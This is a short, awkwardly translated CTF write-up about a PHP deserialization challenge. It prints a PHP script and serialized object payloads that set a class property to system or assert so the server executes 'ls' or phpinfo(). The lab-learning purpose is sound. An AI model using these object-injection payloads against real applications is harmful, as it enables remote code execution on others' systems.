Weekly learning summary

1. Open the web page ：
   
   There is no point that can be used , View the source code ：
   
   I found such a passage at the bottom , Click to find the source code ：
   

2. Obviously, code auditing , Because the code is very simple, don't go into too much detail , The direct idea is to deserialize , The idea here is to $b The assignment is system And so on. , take $a Assign to the command executed
   So we started writing payload, What we can think of to execute the order is system and eval, So here we use system Directory traversal ：

   <?php
   
   class HelloPhp
   {
         
       public $a="ls";
       public $b=system;
        
     
   }
    $c = new HelloPhp;
    $b = serialize($c);
   echo $b;
   
   
   ?>
   

   O:8:“HelloPhp”:2:{s:1:“a”;s:2:“ls”;s:1:“b”;s:6:“system”;}
   According to the content ：
   That's not right , Maybe it's filtered , So let's change it eval Have a try , Because this is execution php Code, so let's try it first phpinfo() :
   
   Not even output , Definitely not , What's going on now , have a look Others' wp

3. They used assert , Isn't this assertion ？ But it will judge the next step by executing the first parameter , It's fine too
   structure payload:

   O:8:“HelloPhp”:2:{s:1:“a”;s:9:“phpinfo()”;s:1:“b”;s:6:“assert”;}
   
   Find on the current page flag You can find it

summary

1. This level tells us in PHP The execution code in is sysytem() eval() assert()
2. About assert() Another question of ： Attack and defend the world -mfw